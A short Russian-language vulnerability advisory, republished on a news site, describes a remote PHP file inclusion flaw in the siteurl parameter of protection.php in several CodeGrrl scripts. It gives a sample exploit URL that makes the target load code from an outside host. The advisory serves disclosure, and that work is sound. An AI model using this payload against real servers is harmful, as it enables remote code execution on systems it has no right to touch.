Навигация
Главная »  Интернет 

PHP инклюдинг в продуктах CodeGrrl


Программы: PHPCalendar 1.x
PHPClique 1.x
PHPCurrently 2.x
PHPFanBase 2.x
PHPQuotes 1.x

Опасность: Высокая

Наличие эксплоита: Да

Описание: Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе.

Уязвимость существует при обработке входных данных в параметре siteurl сценария protection.php. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольный PHP сценарий на системе с привилегиями web сервера. Для успешной эксплуатации уязвимости опция register_globals должна быть включена в конфигурационном файле PHP. Пример:

http://www.example.com/protection.php?action=logout& siteurl=http://yourhost.com/malicoius-code.txt

URL производителя: http://codegrrl.com/

Решение: Способов устранения уязвимости не существует в настоящее время.

 

 Agnitum выпустила решение Outpost Security Suite Pro.
 Веб дизайн: искусство на службе бизнеса.
 Вышел первый легальный релиз новой ветки PHP - 5.1.0..
 Выход новой версии Twilight CMS 4.32 с уникальной системой бизнес-аналитики..
 Интернет-СМИ подвергнут массовому тестированию.


Главная »  Интернет 

© 2017 Team.Furia.Ru.
Частичное копирование материалов разрешено.